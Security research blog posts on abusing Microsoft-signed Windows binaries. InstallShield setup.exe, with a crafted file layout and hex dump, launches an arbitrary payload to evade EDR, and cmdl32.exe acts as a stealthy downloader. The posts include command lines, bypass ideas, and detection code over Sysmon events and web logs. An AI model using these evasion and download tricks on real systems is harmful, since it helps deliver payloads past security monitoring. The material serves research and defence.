
Beating shields of EDR with the 16-bit setup

October 14, 2017 in Anti-Forensics, Archaeology, Compromise Detection, File Formats ZOO, Forensic Analysis, Living off the land, Malware Analysis

This is probably the most bizarre way of breaking the process tree you will see today, but well, it works, so there you go…

Have you ever wondered what these guys are?

  • C:\Windows\System32\InstallShield\setup.exe
  • C:\Windows\SysWOW64\InstallShield\setup.exe

Yup, me neither – until today.

Turns out that this is a very old school InstallShield setup program.

It has an interesting property: it is signed by Microsoft and ships with many versions of Windows.

It turns out that you can use it for at least two different purposes.

  • Side-load the _setup.dll it relies on (a signed .exe loading an unsigned DLL)
  • Spawn an .exe of your choice, breaking the process tree in a very lame way

The first one is trivial.

The second one is the really weird one – we have to create a fake setup directory layout that will allow us to execute a program of our choice.

We need these files to pull it off:

  • _inst32i.ex_
    • the binary that setup.exe requires; after toying around with an existing _inst32i.ex_ file from an old installation I came up with this minimalistic file layout, which you need to save as _inst32i.ex_:
00 : 2A AB 79 D8 00 01 00 00 00 00 00 00 00 00 00 00 *.y............. 000
10 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 016
20 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 032
30 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 048
40 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 00 ................ 064
50 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 080
60 : 00 00 00 00 00 00 0B 00 49 4E 53 54 41 4C 4C 2E ........INSTALL. 096
70 : 45 58 45 01 00 58 00 00 00 00 00 00 00 00 00 00 EXE..X.......... 112
80 : 00 00 00 00 00 00 00 00 00 00 09 00 7A 64 61 74 ............zdat 128
90 : 61 2E 64 6C 6C 01 00 5A 00 00 00 00 00 00 00 00 a.dll..Z........ 144
A0 : 00 00 00 00 00 00 00 00 00 00 00 00 0B 00 57 55 ..............WU 160
B0 : 54 4C 39 35 69 2E 44 4C 4C 01 00 58 00 00 00 00 TL95i.DLL..X.... 176
C0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 192
D0 : 0A 00 42 4F 4F 54 31 36 2E 45 58 45 01 00 58    ..BOOT16.EXE..X  208
  • _setup.dll
    • already on the system
  • layout.bin
    • just type “echo > layout.bin”
  • setup.exe
    • already on the system, signed
  • SETUP.LID
[Languages]
key0=0009
Default=0009
count=1

Finally, the payload – save it inside this file:

  • xtract_all.exe

or make xtract_all.exe a dummy and store the payload inside the _isdel.exe file instead.

Now, all you have to do is to run:

setup.exe /extract_all /s

This will execute setup.exe in silent mode and force it to launch both xtract_all.exe and _isdel.exe.

Interestingly, the _isdel.exe is launched from the same directory, but xtract_all.exe will be executed from the %TEMP% directory.

Yup. It’s complicated, I told you 😉

This can be taken a step further. Instead of using the /extract_all trick, you can actually generate your own _inst32i.ex_ file that holds the payload. Since it’s an old proprietary InstallShield package file format, it is unlikely its content is scanned for malware. To generate a payload you may either use an InstallShield installer (if you can find one!), or... reverse engineer the package file format…
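A detection-side view of the two tricks above, added here as an example that is not from the original post: it runs over constructed Sysmon-style process-create and image-load events and flags a setup.exe parent that spawns xtract_all.exe or _isdel.exe, runs with /extract_all, starts a child from a Temp directory, or loads an unsigned _setup.dll. Field names follow Sysmon's; the events and helper names are my own.

```python
"""Detection for the InstallShield setup.exe tricks described above, over Sysmon-style
events (EventID 1 = process create, 7 = image load). Sample events are constructed."""
import ntpath

SUSPICIOUS_CHILDREN = {"xtract_all.exe", "_isdel.exe"}  # children spawned by /extract_all

def _base(path):
    return ntpath.basename(path).lower()

def check_process_create(ev):
    """Reasons a process-create event with setup.exe as parent is suspicious."""
    reasons = []
    if _base(ev.get("ParentImage", "")) != "setup.exe":
        return reasons
    child = ev.get("Image", "")
    if _base(child) in SUSPICIOUS_CHILDREN:
        reasons.append(f"setup.exe spawned {_base(child)}")
    if "/extract_all" in ev.get("ParentCommandLine", "").lower():
        reasons.append("setup.exe ran with /extract_all")
    if "\\temp\\" in child.lower():
        reasons.append("child started from a Temp directory")
    return reasons

def check_image_load(ev):
    """The signed setup.exe loading an unsigned _setup.dll (DLL side-load)."""
    if _base(ev.get("Image", "")) != "setup.exe" or _base(ev.get("ImageLoaded", "")) != "_setup.dll":
        return []
    if ev.get("Signed", "false").lower() == "true":
        return []
    return [f"setup.exe loaded unsigned {ev['ImageLoaded']}"]

def scan(events):
    """Return (event index, reason) pairs for every suspicious event."""
    hits = []
    for i, ev in enumerate(events):
        check = check_process_create if ev.get("EventID") == 1 else check_image_load
        hits.extend((i, r) for r in check(ev))
    return hits

SAMPLE_EVENTS = [  # constructed, not real telemetry
    {"EventID": 1, "ParentImage": r"C:\Users\bob\pkg\setup.exe", "ParentCommandLine": "setup.exe /extract_all /s",
     "Image": r"C:\Users\bob\AppData\Local\Temp\xtract_all.exe"},
    {"EventID": 1, "ParentImage": r"C:\Users\bob\pkg\setup.exe", "ParentCommandLine": "setup.exe /extract_all /s",
     "Image": r"C:\Users\bob\pkg\_isdel.exe"},
    {"EventID": 7, "Image": r"C:\Users\bob\pkg\setup.exe", "ImageLoaded": r"C:\Users\bob\pkg\_setup.dll", "Signed": "false"},
    {"EventID": 1, "ParentImage": r"C:\Windows\explorer.exe", "ParentCommandLine": "explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe"},
]
```

Matching on the setup.exe basename rather than the System32\InstallShield path matters here, because the fake directory layout copies the signed binary out of its original location.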

The Archaeologologogology #3 – Downloading stuff with cmdl32

April 30, 2017 in Archaeology, Living off the land, Reversing

One of the less-known tools residing in the Windows system32 directory is cmdl32.exe. It is used by CMAK (Connection Manager Administration Kit) to set up Connection Manager service profiles. A profile is typically packaged into an .exe that can be deployed to the user's system; the package installs the profile, which can then be used to launch a dial-up/VPN connection.

On older versions of Windows, e.g. XP, you could fool cmdl32.exe into acting as a simple downloader.

You can create 3 files:

  • A profile file
    [Profile Format]
    Version=4
    [Connection Manager]
    CMSFile=<settings file name - described next>
  • A settings file
    [Connection Manager]
    TunnelFile=<tunnel file name - described next>
  • A tunnel file
    [Settings]
    UpdateUrl=URL pointing to the file

The file that UpdateUrl points to needs to start with a [VPN Servers] profile section, followed by the actual data, e.g.:

[VPN Servers]
This could be anything...

All you have to do now is to launch cmdl32.exe, passing it the full path to the profile file together with the /vpn argument, e.g.:

cmdl32 c:\test\profile /vpn

The program will read the profile file and take the settings file name from it; then it reads the settings file and extracts the name of the VPN tunnel file; finally, from the tunnel file it retrieves the update URL. Once downloaded, the file that UpdateUrl points to overwrites the tunnel file.

If it sounds complicated, it definitely is :), but it works, and such a download could potentially fly under the radar of security products.

The request sent by the tool looks as follows:

GET / HTTP/1.1
User-Agent: Microsoft(R) Connection Manager Vpn File Update
Host: <domain>

So it’s easy to look for it in the logs. The version of the tool shipped with newer versions of Windows is a bit more careful: it checks whether the RAS connection named in the settings file is present (note that in my example no RAS connection is listed inside the settings file), and only if it is does the tool continue. The alternative to the VPN download is the PhoneBook download, but this also requires the presence of the RAS connection. You can read about Connection Manager Tools and Settings on the Microsoft web page from 2003.
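The log-side check the paragraph above suggests, added here as an example that is not from the original post: it parses constructed Apache combined-format web log lines, returns the entries carrying the Connection Manager User-Agent quoted above, and, on the endpoint side, recognises a cmdl32.exe command line that carries a profile path plus /vpn. The log lines, hosts and helper names are my own.

```python
"""Log-side detection for the cmdl32.exe download trick described above.
The log lines below are constructed (Apache combined format); the User-Agent
string is the one quoted in the post."""
import re

CM_USER_AGENT = "Microsoft(R) Connection Manager Vpn File Update"

# Apache "combined" log format: client ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

def parse_line(line):
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None  # None for lines that are not combined-format

def find_cm_downloads(lines):
    """Return parsed entries whose User-Agent is the Connection Manager updater."""
    hits = []
    for line in lines:
        entry = parse_line(line)
        if entry and entry["agent"] == CM_USER_AGENT:
            hits.append(entry)
    return hits

def is_cmdl32_vpn_launch(command_line):
    """Process-create side: cmdl32.exe handed a profile path plus the /vpn switch."""
    tokens = command_line.lower().replace('"', "").split()
    if not tokens:
        return False
    exe = tokens[0].rsplit("\\", 1)[-1]  # strip any directory from the image name
    return exe in ("cmdl32", "cmdl32.exe") and "/vpn" in tokens[1:]

SAMPLE_LOG = [  # constructed lines; 10.0.0.x are made-up clients
    '10.0.0.5 - - [30/Apr/2017:10:15:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Microsoft(R) Connection Manager Vpn File Update"',
    '10.0.0.7 - - [30/Apr/2017:10:15:03 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0 (Windows NT 6.1)"',
    'garbage line that does not parse',
    '10.0.0.5 - - [30/Apr/2017:10:16:40 +0000] "GET /vpn.txt HTTP/1.1" 200 77 "-" "Microsoft(R) Connection Manager Vpn File Update"',
]
```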

If you have a spare XP box you can test this functionality by downloading this package, placing its content inside c:\test and launching cmdl32.exe via the following command:

cmdl32 c:\test\cmdl32_xp.cmp /vpn

Will this still work on newer versions?

I don’t know, but here are two ideas:

  • As long as _some_ program can be smuggled into the victim’s system (e.g. via a malicious attachment), it could launch cmdl32.exe under the control of a custom debugger and patch the RAS enumeration check at run time
  • Perhaps it’s possible to find a configuration where the RAS enumeration check passes; knowing the RAS connection’s name, one could set up a profile that would allow the download

In terms of forensics, you may find the following file inside the %TEMP% folder (XP-only):

  • %Temp%\VPN<random>.tmp

In any case, it’s just a trivia – it cannot really become a replacement for BITS…